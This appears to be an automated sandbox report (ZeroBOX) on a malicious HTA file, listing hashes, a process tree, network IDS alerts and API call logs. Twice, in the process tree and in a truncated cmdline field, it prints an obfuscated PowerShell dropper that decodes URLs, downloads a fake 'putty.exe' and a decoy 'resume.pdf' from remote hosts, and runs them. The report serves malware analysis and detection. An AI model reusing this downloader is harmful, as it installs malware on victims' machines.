Summary | ZeroBOX

1.hta

Generic Malware Antivirus AntiVM AntiDebug PowerShell
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 9, 2023, 9:38 p.m. Sept. 9, 2023, 9:40 p.m.
Size 116.2KB
Type HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5 ff3ba7711a230e6c17ac77a271ec3622
SHA256 f68000c54926a068647a10aacdba25153f8845a7f671ca43468ccabc8d758789
CRC32 95F4C7C8
ssdeep 1536:WYRX/65uRJemGN5+OQlWRl1Mk350P96ABNQsoNFc1Uoi2lOo5tSiYZLAlH6dk6UN:v/l0kQHSeM
Yara None matched

  • iexplore.exe (PID 2620) "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\1.hta.html
    • iexplore.exe (PID 2708) "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2620 CREDAT:145409
      • powershell.exe (PID 2932) "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LiGvHIOT($txOWRyeIebeb, $oLpNFYWdIfVI){[IO.File]::WriteAllBytes($txOWRyeIebeb, $oLpNFYWdIfVI)};function FwSFiiFSYVTVTHXIL($txOWRyeIebeb){if($txOWRyeIebeb.EndsWith((uOOYYDAttqilkKNbGR @(57978,58032,58040,58040))) -eq $True){Start-Process (uOOYYDAttqilkKNbGR @(58046,58049,58042,58032,58040,58040,57983,57982,57978,58033,58052,58033)) $txOWRyeIebeb}else{Start-Process $txOWRyeIebeb}};function VfYawVMDSrUtxA($OSNQHjhsSMprXg){$oLFtNqCcnUSsMU = New-Object (uOOYYDAttqilkKNbGR @(58010,58033,58048,57978,58019,58033,58030,57999,58040,58037,58033,58042,58048));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$oLpNFYWdIfVI = $oLFtNqCcnUSsMU.DownloadData($OSNQHjhsSMprXg);return $oLpNFYWdIfVI};function uOOYYDAttqilkKNbGR($lIYzshXR){$wxUWk=57932;$cNLkEyfPHma=$Null;foreach($gHylftyO in $lIYzshXR){$cNLkEyfPHma+=[char]($gHylftyO-$wxUWk)};return $cNLkEyfPHma};function XMHJopzpJ(){$WOIZqGZPbjNthFdWxT = $env:AppData + '\';$xOAHReFL = $WOIZqGZPbjNthFdWxT + 'putty.exe'; if (Test-Path -Path $xOAHReFL){FwSFiiFSYVTVTHXIL $xOAHReFL;}Else{ $BUorXeLMEEUr = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR @(58036,58048,58048,58044,58047,57990,57979,57979,58048,58036,58033,57978,58033,58029,58046,58048,58036,57978,58040,58037,57979,58058,58047,58035,58048,58029,58048,58036,58029,58041,57979,58044,58049,58048,58048,58053,57979,58040,58029,58048,58033,58047,58048,57979,58051,57986,57984,57979,58044,58049,58048,58048,58053,57978,58033,58052,58033));LiGvHIOT $xOAHReFL $BUorXeLMEEUr;FwSFiiFSYVTVTHXIL $xOAHReFL;};$CzIiUhxSTLAUdkft = $WOIZqGZPbjNthFdWxT + 'resume.pdf';If(Test-Path -Path $CzIiUhxSTLAUdkft){Invoke-Item $CzIiUhxSTLAUdkft;}Else{ $KNkswdkLPiuMkJRrQhZq = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR @(58036,58048,58048,58044,58047,57990,57979,57979,58048,58046,58029,58042,58047,58034,58033,58046,57978,58047,58036,57979,58035,58033,58048,57979,57999,58037,58033,57989,58052,57988,57979,58046,58033,58047,58049,58041,58033,57978,58044,58032,58034));LiGvHIOT $CzIiUhxSTLAUdkft $KNkswdkLPiuMkJRrQhZq;Invoke-Item $CzIiUhxSTLAUdkft;};;;;}XMHJopzpJ;

IP Address Status Action
144.76.136.153 Active Moloch
164.124.101.2 Active Moloch
23.67.53.17 Active Moloch
93.93.131.124 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.101:54148 -> 164.124.101.2:53 2034316 ET POLICY Observed DNS Query to File Transfer Service Domain (transfer .sh) Potentially Bad Traffic
UDP 192.168.56.101:54148 -> 164.124.101.2:53 2035139 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in DNS Lookup) Misc activity
TCP 192.168.56.101:49169 -> 93.93.131.124:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49170 -> 93.93.131.124:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
UDP 192.168.56.101:54148 -> 8.8.8.8:53 2034316 ET POLICY Observed DNS Query to File Transfer Service Domain (transfer .sh) Potentially Bad Traffic
UDP 192.168.56.101:54148 -> 8.8.8.8:53 2035139 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in DNS Lookup) Misc activity
TCP 192.168.56.101:49171 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.101:49171 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 144.76.136.153:443 -> 192.168.56.101:49171 2033076 ET POLICY Observed File Transfer Service SSL/TLS Certificate (transfer .sh) Potential Corporate Privacy Violation

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1 192.168.56.101:49171 -> 144.76.136.153:443 | Issuer: C=US, O=Let's Encrypt, CN=R3 | Subject: CN=transfer.sh | Fingerprint: 4b:77:1f:b2:fe:8e:4f:93:e4:34:20:28:f2:b6:7a:3a:ff:0f:d1:f6

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003d2480
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e340
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e340
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e340
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e2d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e2d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e340
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e340
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e340
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e340
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e570
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e570
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e570
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e030
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e030
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e030
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32eb20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32eb20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32eb20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32eb20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32eb20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32eb20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32eb20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32eb20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000004507d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000004507d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000004507d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003b7c30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003b7c30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003b7bc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003b7bc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003b7ae0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003b7ae0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003b7ae0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b366bd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b366bd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b366c40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b366c40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3676c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3676c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003d2330
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003d2330
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003d23a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003d23a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003d23a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003d23a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003b7c30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003b7c30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3b3ba0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3b3ba0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2620
region_size: 13570048
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002c10000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2620
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003900000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769cd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefefc4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdcd1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769ba000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2620
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000030e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003900000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769cd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefefc4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdcd1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769ba000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2708
region_size: 8851456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002600000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2708
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002e70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769cd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LiGvHIOT($txOWRyeIebeb, $oLpNFYWdIfVI){[IO.File]::WriteAllBytes($txOWRyeIebeb, $oLpNFYWdIfVI)};function FwSFiiFSYVTVTHXIL($txOWRyeIebeb){if($txOWRyeIebeb.EndsWith((uOOYYDAttqilkKNbGR @(57978,58032,58040,58040))) -eq $True){Start-Process (uOOYYDAttqilkKNbGR @(58046,58049,58042,58032,58040,58040,57983,57982,57978,58033,58052,58033)) $txOWRyeIebeb}else{Start-Process $txOWRyeIebeb}};function VfYawVMDSrUtxA($OSNQHjhsSMprXg){$oLFtNqCcnUSsMU = New-Object (uOOYYDAttqilkKNbGR @(58010,58033,58048,57978,58019,58033,58030,57999,58040,58037,58033,58042,58048));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$oLpNFYWdIfVI = $oLFtNqCcnUSsMU.DownloadData($OSNQHjhsSMprXg);return $oLpNFYWdIfVI};function uOOYYDAttqilkKNbGR($lIYzshXR){$wxUWk=57932;$cNLkEyfPHma=$Null;foreach($gHylftyO in $lIYzshXR){$cNLkEyfPHma+=[char]($gHylftyO-$wxUWk)};return $cNLkEyfPHma};function XMHJopzpJ(){$WOIZqGZPbjNthFdWxT = $env:AppData + '\';$xOAHReFL = $WOIZqGZPbjNthFdWxT + 'putty.exe'; if (Test-Path -Path $xOAHReFL){FwSFiiFSYVTVTHXIL $xOAHReFL;}Else{ $BUorXeLMEEUr = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR @(58036,58048,58048,58044,58047,57990,57979,57979,58048,58036,58033,57978,58033,58029,58046,58048,58036,57978,58040,58037,57979,58058,58047,58035,58048,58029,58048,58036,58029,58041,57979,58044,58049,58048,58048,58053,57979,58040,58029,58048,58033,58047,58048,57979,58051,57986,57984,57979,58044,58049,58048,58048,58053,57978,58033,58052,58033));LiGvHIOT $xOAHReFL $BUorXeLMEEUr;FwSFiiFSYVTVTHXIL $xOAHReFL;};$CzIiUhxSTLAUdkft = 